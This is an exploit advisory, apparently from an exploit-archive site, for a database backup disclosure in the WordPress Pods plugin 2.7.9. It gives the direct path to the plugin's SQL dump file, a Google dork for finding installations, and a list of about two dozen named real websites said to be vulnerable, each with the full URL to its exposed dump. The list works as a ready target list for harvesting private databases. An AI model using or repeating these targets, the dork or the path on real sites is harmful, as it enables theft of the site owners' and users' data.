WordPress Pods plugin version 2.7.9 suffers from a database disclosure vulnerability.
cf6b7063621e6cc90dde1ba78830d5b5#################################################################################################
# Exploit Title : WordPress Pods Plugins 2.7.9 Database Backup Arbitrary
File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 22/11/2018
# Vendor Homepage :
+ wordpress.org/plugins/pods/ ~ pods.io
+
github.com/openmhealth/omh.website/blob/master/wp-content/plugins/pods/sql/dump.sql
# Software Download Link : downloads.wordpress.org/plugin/pods.2.7.9.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.7.9
# Google Dorks : inurl:/wp-content/plugins/pods/
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/pods/sql/dump.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] oljesaljarna.se/wp-content/plugins/pods/sql/dump.sql
[+] right-ink.com/wp-content/plugins/pods/sql/dump.sql
[+] annpettersson.se/wp-content/plugins/pods/sql/dump.sql
[+] actuarchi.com/wp-content/plugins/pods/sql/dump.sql
[+] stcp.com.br/wp-content/plugins/pods/sql/dump.sql
[+] vallicella.fr/wp-content/plugins/pods/sql/dump.sql
[+] erichalfvarson.com/wp-content/plugins/pods/sql/dump.sql
[+] spinefarmrecords.com/wp-content/plugins/pods/sql/dump.sql
[+] few.org/wp-content/plugins/pods/sql/dump.sql
[+] vbs-jasper.com/wp-content/plugins/pods/sql/dump.sql
[+] kirabpemuda2018.com/wp-content/plugins/pods/sql/dump.sql
[+] liveandinspire.com/wp-content/plugins/pods/sql/dump.sql
[+] househunters.org/listings/wp-content/plugins/pods/sql/dump.sql
[+] radioradio.fr/wp-content/plugins/pods/sql/dump.sql
[+] hbclebanon.com/wp-content/plugins/pods/sql/dump.sql
[+] montevidarentals.com/wp-content/plugins/pods/sql/dump.sql
[+] autosijalice.rs/wp-content/plugins/pods/sql/dump.sql
[+] smseafoodmarket.com/wp-content/plugins/pods/sql/dump.sql
[+] brno-cernovice.cz/wp-content/plugins/pods/sql/dump.sql
[+] inovageracao.com/wp-content/plugins/pods/sql/dump.sql
[+] linneindustries.com/wp-content/plugins/pods/sql/dump.sql
[+] ecovidaproperties.com/wp-content/plugins/pods/sql/dump.sql
[+] hwzone.co.il/wp-content/plugins/pods/sql/dump.sql
[+] inkafarma.com.pe/wp-content/plugins/pods/sql/dump.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################